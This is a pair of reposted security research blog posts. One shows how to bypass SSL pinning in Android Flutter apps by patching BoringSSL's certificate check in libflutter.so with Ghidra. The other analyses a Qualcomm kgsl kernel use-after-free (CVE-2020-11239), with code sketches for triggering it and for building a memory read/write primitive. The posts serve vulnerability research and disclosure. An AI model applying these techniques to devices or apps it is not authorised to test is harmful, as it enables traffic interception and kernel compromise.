Bypassing SSL pinning on Android Flutter Apps with Ghidra


Original text by Raphael Denipotti

TL;DR

Android apps built with the Flutter framework validate secure connections and honour the proxy settings in a different fashion than apps written in Java/Kotlin (compiled to dex). A binary dubbed libflutter.so appears to contain the dependencies responsible for establishing remote connections. This post shows the steps to patch that binary to bypass SSL pinning on Android apps (armeabi-v7a).

This binary (libflutter.so) appears to contain the Flutter engine, compiled ahead-of-time (AOT). With that in mind, I have left the two patched binaries (armeabi-v7a and x86_64) available for security researchers assessing Android Flutter apps that use Dart 2.10.5 (stable). I tested these binaries on other Flutter apps using the same Dart version and they seemed to work just fine.

Additionally, you can try downloading the patched binary for your platform and replacing the one inside the app you want to analyze. Remember to re-sign the app before use, and bear in mind that the Dart version influences the engine, so different versions might not work.

Introduction

Flutter is an open-source SDK created and maintained by Google to ease the development of mobile and web applications. One of its main characteristics is the use of Dart as the programming language, which changes some of the behaviors normally found in Android apps: Android Flutter apps don’t honour the Android proxy settings, nor do they trust the Android TrustManager. An overview of its architecture can be found here.

Motivation

I’ve been fond of bypassing SSL certificate pinning on Android apps since long ago, when I was a security consultant. At that time I could never really understand how Frida worked, but I recall trying to bypass SSL pinning by modifying smali code for known libs like okhttp.

Recently a friend of mine, Vinicius, mentioned he was facing some challenges with an app built using Flutter. The main challenge arose from the fact that Flutter apps don’t trust the Android TrustManager. He also said that Frida could be used to instrument BoringSSL, one of the dependencies of libflutter.so.

As I mentioned, I’ve never been a fan of Frida, as its abstraction always confused my shallow knowledge of binary analysis and code instrumentation. When Vinicius shared libflutter.so with me, alongside this blog post as a reference for intercepting traffic of Android Flutter applications, I saw an opportunity to eliminate the use of Frida for this case and patch the binary to avoid certificate verification failures.

Analysis

From Jeroen Beckers’s post I learned that the exception was generated by handshake.cc in BoringSSL. This mattered because, as Vinicius mentioned, the app was suppressing errors, which made it harder to instrument with Frida.

The method ssl_crypto_x509_session_verify_cert_chain is responsible for performing the validation and returns a boolean value. Knowing that, it’s a matter of changing its return value so that it is always true (1):
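
Roughly, the function in question looks like this (a sketch paraphrasing BoringSSL’s ssl_x509.cc; the exact signature may differ in the copy compiled into libflutter.so), and the patch amounts to forcing its return value:

#include <stdint.h>

/* Opaque stand-ins for BoringSSL's internal types (sketch only). */
typedef struct ssl_session_st SSL_SESSION;
typedef struct ssl_handshake_st SSL_HANDSHAKE;

/* Paraphrased from BoringSSL's ssl_x509.cc: returns 1 when the certificate
 * chain verifies and 0 otherwise. Forcing the return value to 1 is what the
 * Ghidra patch below achieves. */
static int ssl_crypto_x509_session_verify_cert_chain(SSL_SESSION *session,
                                                     SSL_HANDSHAKE *hs,
                                                     uint8_t *out_alert) {
  (void)session; (void)hs; (void)out_alert;
  /* ... builds an X509_STORE_CTX and runs the chain verification ... */
  /* after the patch this effectively becomes: */
  return 1; /* always report the chain as valid */
}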

In this analysis I used the armeabi-v7a ISA to depict the following steps.

Steps for armeabi-v7a

We will use Ghidra for the binary patching. This assumes you’ve already disassembled the APK (apktool d command) and grabbed libflutter.so from the related lib folder (/lib/armeabi-v7a/libflutter.so).

Note that the patching process might differ for different instruction set architectures. For the x86_64 ISA, a very similar approach can be used, while for arm64-v8a the return of the function is handled quite differently (on Dart 2.10.5).

Open the libflutter.so using Ghidra. You will be asked if you would like Ghidra to analyze the binary. Hit Yes followed by Analyze.

After some (good) amount of time disassembling the instructions, Ghidra will present disassembled code that can be searched and read alongside its C representation. We know that the certificate validation happens in this piece of code:

Search for the references linking to this file [ Search | For Strings ]

The disassembler shows that the analyzed libflutter.so has 8 cross references (XREF) to the aforementioned file. Going over all of them, it’s possible to spot a function very similar to ssl_crypto_x509_session_verify_cert_chain, based on the parameter definitions presented in the disassembled code:

Investigating the disassembled code and the instructions further, it’s possible to note that the register r4 is used to hold the return value of ssl_crypto_x509_session_verify_cert_chain:

Knowing this, all we need to do is change it to 1, as in the following:

Note that the change we just made is reflected in the decompiled code, indicating that the function will always return 1 (true):

Save the changes (File | Save “libflutter.so”) and export the binary as follows:

Make sure to select the ELF format when exporting the file. Hit OK and cross your fingers.

If everything works fine you will see a summary like the following:

Now you just have to put the patched binary back into the disassembled APK, reassemble it (apktool b) and sign it again. Install the app on your device or emulator and happy intercepting. It’s worth noting that, as highlighted by Jeroen, “Dart is not proxy aware on Android”, so the use of ProxyDroid or iptables is required.

Credits

Last but not least, I’d like to give credit to my friend Vinicius. Without his analysis, and the opportunity of a second shot at testing the app, this method wouldn’t have been documented.

And of course to Jeroen Beckers’ post that presented the initial steps with Frida and where/how to look.

One day short of a full chain: Part 1 — Android Kernel arbitrary code execution


Original text by Man Yue Mo

In this series of posts, I’ll exploit three bugs that I reported last year: a use-after-free in the renderer of Chrome, a Chromium sandbox escape that was reported and fixed while it was still in beta, and a use-after-free in the Qualcomm msm kernel. Together, these three bugs form an exploit chain that allows remote kernel code execution by visiting a malicious website in the beta version of Chrome. While the full chain itself only affects the beta version of Chrome, both the renderer RCE and the kernel code execution existed in stable versions of the respective software. All of these bugs had been patched for quite some time, with the last one patched on the first of January.

Vulnerabilities used in the series

The three vulnerabilities that I’m going to use are the following. To achieve arbitrary kernel code execution from a compromised beta version of Chrome, I’ll use CVE-2020-11239, which is a use-after-free in the kgsl driver in the Qualcomm msm kernel. This vulnerability was reported in July 2020 to the Android security team as A-161544755 (GHSL-2020-375) and was patched in the January Bulletin. In the security bulletin, this bug was mistakenly associated with A-168722551, although the Android security team has since confirmed that it will acknowledge me as the original reporter of the issue. (However, the acknowledgement page had not been updated to reflect this at the time of writing.) For compromising Chrome, I’ll use CVE-2020-15972, a use-after-free in web audio, to trigger a renderer RCE. This is a duplicate bug, which an anonymous researcher reported about three weeks before I reported it as 1125635 (GHSL-2020-167). To escape the Chrome sandbox and gain control of the browser process, I’ll use CVE-2020-16045, which was reported as 1125614 (GHSL-2020-165). While the exploit uses a component that was only enabled in the beta version of Chrome, the bug would probably have made it into the stable version and been exploitable had it not been reported. Interestingly, the renderer bug CVE-2020-15972 was fixed in version 86.0.4240.75, the same version in which the sandbox escape bug would have made it into the stable version of Chrome (if not reported), so these two bugs literally missed each other by one day to form a stable full chain.

Qualcomm kernel vulnerability

The vulnerability used in this post is a use-after-free in the kernel graphics support layer (kgsl) driver. This driver is used to provide an interface for apps in the userland to communicate with the Adreno gpu (the gpu that is used on Qualcomm’s snapdragon chipset). As it is necessary for apps to access this driver to render themselves, this is one of the few drivers that can be reached from third-party applications on all phones that use Qualcomm chipsets. The vulnerability itself can be triggered on all of these phones that have a kernel version 4.14 or above, which should be the case for many mid-high end phones released after late 2019, for example, Pixel 4, Samsung Galaxy S10, S20, and A71. The exploit in this post, however, could not be launched directly from a third party App on Pixel 4 due to further SELinux restrictions, but it can be launched from third party Apps on Samsung phones and possibly some others as well. The exploit in this post is largely developed with a Pixel 4 running AOSP built from source and then adapted to a Samsung Galaxy A71. With some adjustments of parameters, it should probably also work on flagship models like Samsung Galaxy S10 and S20 (Snapdragon version), although I don’t have those phones and have not tried it out myself.

The vulnerability here concerns the ioctl calls IOCTL_KGSL_GPUOBJ_IMPORT and IOCTL_KGSL_MAP_USER_MEM. These calls are used by apps to create shared memory between themselves and the kgsl driver.

When using these calls, the caller specifies a user space address in their process, the size of the shared memory, as well as the type of memory objects to create. After making the ioctl call successfully, the kgsl driver would map the user supplied memory into the gpu’s memory space and be able to access the user supplied memory. Depending on the type of the memory specified in the ioctl call parameter, different mechanisms are used by the kernel to map and access the user space memory.
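
A minimal user-space sketch of such an import might look like this (struct and macro names are taken from the msm kernel’s UAPI header msm_kgsl.h and should be treated as assumptions; error handling omitted):

#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/msm_kgsl.h>   /* IOCTL_KGSL_GPUOBJ_IMPORT, struct kgsl_gpuobj_import, ... */

/* Import an anonymous user-space mapping into the gpu as a shared memory
 * object; kgsl_fd is an open handle to /dev/kgsl-3d0. */
static int import_useraddr(int kgsl_fd, size_t size)
{
    void *buf = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    struct kgsl_gpuobj_import_useraddr addr = {
        .virtaddr = (uint64_t)(uintptr_t)buf,
    };
    struct kgsl_gpuobj_import req = {
        .priv     = (uint64_t)(uintptr_t)&addr,
        .priv_len = sizeof(addr),
        .flags    = 0,
        .type     = KGSL_USER_MEM_TYPE_ADDR,  /* or KGSL_USER_MEM_TYPE_ION with a dma-buf fd */
    };
    return ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &req);
}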

The two different types of memory are KGSL_USER_MEM_TYPE_ADDR, which asks kgsl to pin the user memory supplied and perform direct I/O on that memory (see, for example, the Performing Direct I/O section here). The caller can also specify the memory type to be KGSL_USER_MEM_TYPE_ION, which uses a direct memory access (DMA) buffer (for example, the Direct Memory Access section here) allocated by the ion allocator to allow the gpu to access the DMA buffer directly. We’ll look at the DMA buffer a bit more later as it is important to both the vulnerability and the exploit, but for now, we just need to know that there are two different types of memory objects that can be created from these ioctl calls. When using these ioctls, a kgsl_mem_entry object will first be created, and then the type of memory is checked to make sure that the kgsl_mem_entry is correctly populated. In a way, these ioctl calls act like constructors of kgsl_mem_entry:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
    entry = kgsl_mem_entry_create();
    ...
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
    //KGSL_USER_MEM_TYPE_ION is translated to KGSL_USER_MEM_TYPE_DMABUF
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

In particular, when creating a kgsl_mem_entry with DMA type memory, the user supplied DMA buffer will be “attached” to the gpu, which will then allow the gpu to share the DMA buffer. The process of sharing a DMA buffer with a device on Android generally looks like this (see this for the general process):

  1. The user creates a DMA buffer using the ion allocator. On Android, ion is the concrete implementation of DMA buffers, so sometimes the terms are used interchangeably, as in the kgsl code here, in which KGSL_USER_MEM_TYPE_DMABUF and KGSL_USER_MEM_TYPE_ION refers to the same thing.
  2. The ion allocator will then allocate memory from the ion heap, which is a special region of memory separated from the heap used by the kmalloc family of calls. I’ll cover more about the ion heap later in the post.
  3. The ion allocator will return a file descriptor to the user, which is used as a handle to the DMA buffer.
  4. The user can then pass this file descriptor to the device via an appropriate ioctl call.
  5. The device then obtains the DMA buffer from the file descriptor via dma_buf_get and uses dma_buf_attach to attach it to itself.
  6. The device uses dma_buf_map_attachment to obtain the sg_table of the DMA buffer, which contains the locations and sizes of the backing stores of the DMA buffer. It can then use it to access the buffer.
  7. After this, both the device and the user can access the DMA buffer. This means that the buffer can now be modified by both the cpu (by the user) and the device, so care must be taken to synchronize the cpu view of the buffer and the device view of the buffer. (For example, the cpu may cache the content of the DMA buffer and the device may then modify its content, resulting in stale data in the cpu (user) view.) To do this, the user can use the DMA_BUF_IOCTL_SYNC call of the DMA buffer to synchronize the different views of the buffer before and after accessing it (see the user-space sketch below).

When the device is done with the shared buffer, it is important to call the functions dma_buf_unmap_attachment, dma_buf_detach, and dma_buf_put to perform the appropriate clean up.
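
From user space, steps 1, 3 and 7 look roughly like this (a sketch assuming the post-4.12 ion UAPI in linux/ion.h and the standard dma-buf sync ioctl in linux/dma-buf.h; heap selection and error handling omitted):

#include <stdint.h>
#include <sys/ioctl.h>
#include <linux/ion.h>      /* ION_IOC_ALLOC, struct ion_allocation_data (post-4.12 ABI) */
#include <linux/dma-buf.h>  /* DMA_BUF_IOCTL_SYNC, struct dma_buf_sync */

/* Steps 1-3: allocate a DMA buffer from an ion heap and get back a dma-buf fd. */
static int ion_alloc(int ion_fd, uint64_t len, uint32_t heap_id_mask)
{
    struct ion_allocation_data alloc = {
        .len = len,
        .heap_id_mask = heap_id_mask,
        .flags = 0,
    };
    if (ioctl(ion_fd, ION_IOC_ALLOC, &alloc) < 0)
        return -1;
    return alloc.fd;            /* the dma-buf file descriptor (step 3) */
}

/* Step 7: bracket cpu accesses with DMA_BUF_IOCTL_SYNC so the cpu and device
 * views of the buffer stay coherent. */
static void sync_begin_end(int dmabuf_fd)
{
    struct dma_buf_sync sync = { .flags = DMA_BUF_SYNC_START | DMA_BUF_SYNC_RW };
    ioctl(dmabuf_fd, DMA_BUF_IOCTL_SYNC, &sync);
    /* ... cpu reads/writes to the mmap'ed buffer happen here ... */
    sync.flags = DMA_BUF_SYNC_END | DMA_BUF_SYNC_RW;
    ioctl(dmabuf_fd, DMA_BUF_IOCTL_SYNC, &sync);
}

Steps 4 to 6 happen inside the kernel when the dma-buf fd is handed to the driver’s ioctl, as in the kgsl case below.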

In the case of sharing DMA buffer with the kgsl driver, the sg_table that belongs to the DMA buffer will be stored in the kgsl_mem_entry as the field sgt:

static int kgsl_setup_dma_buf(struct kgsl_device *device,
				struct kgsl_pagetable *pagetable,
				struct kgsl_mem_entry *entry,
				struct dma_buf *dmabuf)
{
    ...
	sg_table = dma_buf_map_attachment(attach, DMA_TO_DEVICE);
    ...
	meta->table = sg_table;
	entry->priv_data = meta;
	entry->memdesc.sgt = sg_table;

On the other hand, in the case of a MAP_USER_MEM type memory object, the sg_table in memdesc.sgt is created and owned by the kgsl_mem_entry:

static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
{
    ...
    //Creates an sg_table and stores it in memdesc->sgt
	ret = sg_alloc_table_from_pages(memdesc->sgt, pages, npages,
					0, memdesc->size, GFP_KERNEL);

As such, care must be taken with the ownership of memdesc->sgt when a kgsl_mem_entry is destroyed. If the ioctl call somehow fails, then the memory object that was created has to be destroyed. Depending on the type of the memory, the clean up logic will be different:

unmap:
	if (param->type == KGSL_USER_MEM_TYPE_DMABUF) {
		kgsl_destroy_ion(entry->priv_data);
		entry->memdesc.sgt = NULL;
	}

	kgsl_sharedmem_free(&entry->memdesc);

If we created an ION type memory object, then apart from the extra clean up that detaches the gpu from the DMA buffer, entry->memdesc.sgt is set to NULL before entering kgsl_sharedmem_free, which would otherwise free entry->memdesc.sgt:

void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
{
    ...
	if (memdesc->sgt) {
		sg_free_table(memdesc->sgt);
		kfree(memdesc->sgt);
	}

	if (memdesc->pages)
		kgsl_free(memdesc->pages);
}

So far, so good, everything is taken care of. But a closer look reveals that, when creating a KGSL_USER_MEM_TYPE_ADDR object, the code first checks whether the user supplied address was allocated by the ion allocator; if so, it will create an ION type memory object instead.

static int kgsl_setup_useraddr(struct kgsl_device *device,
		struct kgsl_pagetable *pagetable,
		struct kgsl_mem_entry *entry,
		unsigned long hostptr, size_t offset, size_t size)
{
    ...
 	/* Try to set up a dmabuf - if it returns -ENODEV assume anonymous */
	ret = kgsl_setup_dmabuf_useraddr(device, pagetable, entry, hostptr);
	if (ret != -ENODEV)
		return ret;

	/* Okay - lets go legacy */
	return kgsl_setup_anon_useraddr(pagetable, entry,
		hostptr, offset, size);
}

While there is nothing wrong with using a DMA mapping when the user supplied memory is actually a dma buffer (allocated by ion), if something goes wrong during the ioctl call, the clean up logic will be wrong and memdesc->sgt will be incorrectly deleted. Fortunately, before the ION ABI change introduced in the 4.12 kernel, the now freed sg_table could not be reached again. However, after this change, the sg_table gets added to the dma_buf_attachment when a DMA buffer is attached to a device, and the dma_buf_attachment is then stored in the DMA buffer.

static int ion_dma_buf_attach(struct dma_buf *dmabuf, struct device *dev,
                                struct dma_buf_attachment *attachment)
{
    ...
        table = dup_sg_table(buffer->sg_table);
    ...
        a->table = table;                          //<---- duplicated table stored in the attachment returned by dma_buf_attach
    ...
        mutex_lock(&buffer->lock);
        list_add(&a->list, &buffer->attachments);  //<---- attachment gets added to dma_buf::attachments
        mutex_unlock(&buffer->lock);
        return 0;
}

This will normally be removed when the DMA buffer is detached from the device. However, because of the wrong clean up logic, the DMA buffer will never be detached in this case (kgsl_destroy_ion is not called), meaning that after the ioctl call fails, the user supplied DMA buffer will end up with an attachment that contains a free’d sg_table. This sg_table will then be used any time the DMA_BUF_IOCTL_SYNC call is used on the buffer:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
                                          enum dma_data_direction direction,
                                          bool sync_only_mapped)
{
    ...
        list_for_each_entry(a, &buffer->attachments, list) {
        ...
                if (sync_only_mapped)
                        tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,        //<--- use-after-free of a->table
                                                  a->table->nents,
                                                  &buffer->vmas,
                                                  direction, true);
                else
                        dma_sync_sg_for_cpu(a->dev, a->table->sgl,              //<--- use-after-free of a->table
                                            a->table->nents, direction);
            ...
                }
        }
...
}

There are actually multiple paths in this ioctl that can lead to the use of the sg_table in different ways.

Getting a free’d object with a fake out-of-memory error

While this looks like a very good use-after-free, one that allows me to hold onto a free’d object and use it at any convenient time and in different ways, to trigger it I first need to cause IOCTL_KGSL_GPUOBJ_IMPORT or IOCTL_KGSL_MAP_USER_MEM to fail, and to fail at the right place. The only place where a use-after-free can happen in the IOCTL_KGSL_GPUOBJ_IMPORT call is when it fails at kgsl_mem_entry_attach_process:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

	if (ret)
		goto out;

    ...
	ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
	if (ret)
		goto unmap;

This is the last point where the call can fail; any earlier failure will not result in kgsl_sharedmem_free being called. One way this can fail is if kgsl_mem_entry_track_gpuaddr fails to reserve memory in the gpu address space due to an out-of-memory error:

static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
		struct kgsl_process_private *process,
		struct kgsl_mem_entry *entry)
{
    ...
	ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
	if (ret) {
		kgsl_process_private_put(process);
		return ret;
	}

Of course, actually causing an out-of-memory error would be rather difficult and unreliable, as well as risking a crash of the device by exhausting its memory.

If we look at how a user provided address is mapped to a gpu address in kgsl_iommu_get_gpuaddr, which is called by kgsl_mem_entry_track_gpuaddr (note that these are actually user space gpu addresses, in the sense that the gpu uses them with a process specific pagetable to resolve the actual locations, so different processes can have the same gpu address resolve to different locations, in the same way that user space addresses can be the same in different processes but resolve to different locations), then we see that an alignment parameter is taken from the flags of the kgsl_memdesc:

static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
		struct kgsl_memdesc *memdesc)
{
    ...
	unsigned int align;
    ...
    //Uses `memdesc->flags` to compute the alignment parameter
	align = max_t(uint64_t, 1 << kgsl_memdesc_get_align(memdesc),
			memdesc->pad_to);
...

and the flags of the memdesc are taken from the flags parameter when the ioctl is called:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);

When mapping memory to the gpu, this align value will be used to ensure that the memory is mapped at an address aligned to align (i.e. a multiple of it). In particular, the gpu address will be the next multiple of align that is not already occupied. If no such value exists, then an out-of-memory error will occur. So by using a large align value in the ioctl call, I can easily use up all the addresses that are aligned to the value that I specified. For example, if I set align to 1 << 31, then there will only be two addresses that align with it (0 and 1 << 31). So after just mapping one memory object (which can be as small as 4096 bytes), I’ll get an out-of-memory error the next time I use the ioctl call. This will then give me a free’d sg_table in the DMA buffer. By allocating another object of similar size in the kernel, I can then replace this sg_table with an object that I control. I’ll go through the details of how to do this later, but for now, let’s assume I am able to do this and have complete control of all the fields in this sg_table and see what this bug potentially allows me to do.
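
A sketch of how such a request might be issued from user space follows (the MEMALIGN flag encoding and struct names are taken from the msm UAPI header msm_kgsl.h and should be treated as assumptions; the call is made twice, with the first import occupying the only usable aligned slot and the second failing and taking the buggy clean up path):

#include <stdint.h>
#include <sys/ioctl.h>
#include <linux/msm_kgsl.h>

/* Import a user address that is really an mmap'ed ion dma-buf, requesting a
 * huge gpu-address alignment so that kgsl_mem_entry_attach_process fails
 * with an out-of-memory error on the second call. */
static int import_with_huge_align(int kgsl_fd, void *ion_mapped_addr)
{
    struct kgsl_gpuobj_import_useraddr addr = {
        .virtaddr = (uint64_t)(uintptr_t)ion_mapped_addr,
    };
    struct kgsl_gpuobj_import req = {
        .priv     = (uint64_t)(uintptr_t)&addr,
        .priv_len = sizeof(addr),
        /* ask for 1 << 31 alignment: the value 31 goes into the MEMALIGN bit-field */
        .flags    = (31ULL << KGSL_MEMALIGN_SHIFT) & KGSL_MEMALIGN_MASK,
        .type     = KGSL_USER_MEM_TYPE_ADDR,  /* ADDR type, but backed by an ion buffer */
    };
    return ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &req);
}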

The primitives of the vulnerability

As mentioned before, there are different ways to use the free’d sg_table via the DMA_BUF_IOCTL_SYNC ioctl call:

static long dma_buf_ioctl(struct file *file,
			  unsigned int cmd, unsigned long arg)
{
    ...
	switch (cmd) {
	case DMA_BUF_IOCTL_SYNC:
        ...
		if (sync.flags & DMA_BUF_SYNC_END)
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_end_cpu_access_umapped(dmabuf,
								     dir);
			else
				ret = dma_buf_end_cpu_access(dmabuf, dir);
		else
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_begin_cpu_access_umapped(dmabuf,
								       dir);
			else
				ret = dma_buf_begin_cpu_access(dmabuf, dir);

		return ret;

These will end up calling the functions __ion_dma_buf_begin_cpu_access or __ion_dma_buf_end_cpu_access, which provide the concrete implementations.

As explained before, the DMA_BUF_IOCTL_SYNC call is meant to synchronize the cpu view of the DMA buffer and the device (in this case, gpu) view of the DMA buffer. For the kgsl device, the synchronization is implemented in lib/swiotlb.c. The various different ways of syncing the buffer will more or less follow a code path like this:

  1. The scatterlist in the free’d sg_table is iterated in a loop;
  2. In each iteration, the dma_address and dma_length of the scatterlist are used to identify the location and size of the memory for synchronization.
  3. The function swiotlb_sync_single is called to perform the actual synchronization of the memory.

So what does swiotlb_sync_single do? It first checks whether the dma_address (dev_addr; dma_to_phys for kgsl is just the identity function) in the scatterlist is an address of a swiotlb buffer, using the is_swiotlb_buffer function. If so, it calls swiotlb_tbl_sync_single; otherwise, it calls dma_mark_clean.

static void
swiotlb_sync_single(struct device *hwdev, dma_addr_t dev_addr,
		    size_t size, enum dma_data_direction dir,
		    enum dma_sync_target target)
{
	phys_addr_t paddr = dma_to_phys(hwdev, dev_addr);

	BUG_ON(dir == DMA_NONE);

	if (is_swiotlb_buffer(paddr)) {
		swiotlb_tbl_sync_single(hwdev, paddr, size, dir, target);
		return;
	}

	if (dir != DMA_FROM_DEVICE)
		return;

	dma_mark_clean(phys_to_virt(paddr), size);
}

The function dma_mark_clean simply flushes the cpu cache that corresponds to dev_addr and keeps the cpu cache in sync with the actual memory. I wasn’t able to exploit this path and so I’ll concentrate on the swiotlb_tbl_sync_single path.

void swiotlb_tbl_sync_single(struct device *hwdev, phys_addr_t tlb_addr,
			     size_t size, enum dma_data_direction dir,
			     enum dma_sync_target target)
{
	int index = (tlb_addr - io_tlb_start) >> IO_TLB_SHIFT;
	phys_addr_t orig_addr = io_tlb_orig_addr[index];

	if (orig_addr == INVALID_PHYS_ADDR)                            //<--------- a. checks address valid
		return;
	orig_addr += (unsigned long)tlb_addr & ((1 << IO_TLB_SHIFT) - 1);

	switch (target) {
	case SYNC_FOR_CPU:
		if (likely(dir == DMA_FROM_DEVICE || dir == DMA_BIDIRECTIONAL))
			swiotlb_bounce(orig_addr, tlb_addr,
				       size, DMA_FROM_DEVICE);
    ...
}

After a further check of the address (tlb_addr) against an array io_tlb_orig_addr, the function swiotlb_bounce is called.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
	unsigned char *vaddr = phys_to_virt(tlb_addr);
	if (PageHighMem(pfn_to_page(pfn))) {
        ...

		while (size) {
			sz = min_t(size_t, PAGE_SIZE - offset, size);

			local_irq_save(flags);
			buffer = kmap_atomic(pfn_to_page(pfn));
			if (dir == DMA_TO_DEVICE)
				memcpy(vaddr, buffer + offset, sz);
			else
				memcpy(buffer + offset, vaddr, sz);
            ...
		}
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

As tlb_addr and size come from a scatterlist in the free’d sg_table, it becomes clear that I may be able to call a memcpy with a partially controlled source/destination (tlb_addr comes from the scatterlist but is constrained as it needs to pass some checks, while size is unchecked). This could potentially give me a very strong relative read/write primitive. The questions are:

  1. What is the swiotlb buffer and is it possible to pass the is_swiotlb_buffer check without a separate info leak?
  2. What is io_tlb_orig_addr and how do I pass that test?
  3. How much control do I have over orig_addr, which comes from io_tlb_orig_addr?

The Software Input Output Translation Lookaside Buffer

The Software Input Output Translation Lookaside Buffer (SWIOTLB), sometimes known as the bounce buffer, is a memory region with a physical address smaller than 32 bits. It seems to be very rarely used in modern Android phones, and as far as I can gather, there are two main uses of it:

  1. It is used when a DMA buffer that has a physical address higher than 32 bits is attached to a device that can only access 32 bit addresses. In this case, the SWIOTLB is used as a proxy of the DMA buffer to allow the device to access it. This is the code path that we have been looking at. As this means an extra read/write operation between the DMA buffer and the SWIOTLB every time a synchronization between the device and the DMA buffer happens, it is not an ideal scenario and is rather only used as a last resort.
  2. It is used as a layer of protection to prevent untrusted usb devices from accessing DMA memory directly (see here).

As the second usage is likely to involve plugging a usb device into the phone and thus requires physical access, I’ll only cover the first usage here, which will also answer the three questions from the previous section.

To begin with, let’s take a look at the location of the SWIOTLB. This is used by the check is_swiotlb_buffer to determine whether a physical address belongs to the SWIOTLB:

int is_swiotlb_buffer(phys_addr_t paddr)
{
	return paddr >= io_tlb_start && paddr < io_tlb_end;
}

The global variables io_tlb_start and io_tlb_end mark the range of the SWIOTLB. As mentioned before, the SWIOTLB needs to be at an address smaller than 32 bits. How does the kernel guarantee this? By allocating the SWIOTLB very early during boot. From a rooted device, we can see that the SWIOTLB is allocated nearly right at the start of the boot. This is an excerpt of the kernel log during the early stage of booting a Pixel 4:

...
[    0.000000] c0      0 software IO TLB: swiotlb init: 00000000f3800000
[    0.000000] c0      0 software IO TLB: mapped [mem 0xf3800000-0xf3c00000] (4MB)
...

Here we see that io_tlb_start is 0xf3800000 while io_tlb_end is 0xf3c00000.

While allocating the SWIOTLB early makes sure that its address is below 32 bits, it also makes it predictable. In fact, the address only seems to depend on the amount of memory configured for the SWIOTLB, which is passed as the swiotlb boot parameter. For the Pixel 4, this is swiotlb=2048 (which seems to be a common parameter and is the same for the Galaxy S10 and S20) and will allocate 4MB of SWIOTLB (allocation size = swiotlb * 2048 bytes). For the Samsung Galaxy A71, the parameter is set to swiotlb=1, which allocates the minimum amount of SWIOTLB (0x40000 bytes):

[    0.000000] software IO TLB: mapped [mem 0xfffbf000-0xfffff000] (0MB)

The SWIOTLB will be at the same location when changing swiotlb to 1 on Pixel 4.

This provides us with a predictable location for the SWIOTLB to pass the is_swiotlb_buffer test.

Let’s take a look at io_tlb_orig_addr next. This is an array used for storing the addresses of DMA buffers that are attached to devices but whose addresses are too high for the device to access:

int
swiotlb_map_sg_attrs(struct device *hwdev, struct scatterlist *sgl, int nelems,
		     enum dma_data_direction dir, unsigned long attrs)
{
    ...
	for_each_sg(sgl, sg, nelems, i) {
		phys_addr_t paddr = sg_phys(sg);
		dma_addr_t dev_addr = phys_to_dma(hwdev, paddr);

		if (swiotlb_force == SWIOTLB_FORCE ||
		    !dma_capable(hwdev, dev_addr, sg->length)) {
            //device cannot access dev_addr, so use SWIOTLB as a proxy
			phys_addr_t map = map_single(hwdev, sg_phys(sg),
						     sg->length, dir, attrs);
             ...
}

In this case, map_single will store the address of the DMA buffer (dev_addr) in io_tlb_orig_addr. This means that if I can cause a SWIOTLB mapping to happen by attaching a DMA buffer with a high address to a device that cannot access it (!dma_capable), then the orig_addr in the memcpy of swiotlb_bounce will point to a DMA buffer that I control, which means I can read and write its content with complete control.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
    //orig_addr is the address of a DMA buffer uses the SWIOTLB mapping
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

It now becomes clear that, if I can allocate a SWIOTLB, then I will be able to perform both read and write of a region behind the SWIOTLB region with arbitrary size (and completely controlled content in the case of write). In what follows, this is what I’m going to use for the exploit.

To summarize, this is how synchronization works for a DMA buffer shared with a device when the implementation in /lib/swiotlb.c is used.

When the device is capable of accessing the DMA buffer’s address, synchronization will involve flushing the cpu cache:

figure

When the device cannot access the DMA buffer directly, a SWIOTLB is created as an intermediate buffer to allow device access. In this case, the io_tlb_orig_addr array serves as a lookup table to locate the DMA buffer from the SWIOTLB.

figure

In the use-after-free scenario, I can control the size of the memcpy between the DMA buffer and SWIOTLB in the above figure and that turns into a read/write primitive:

figure

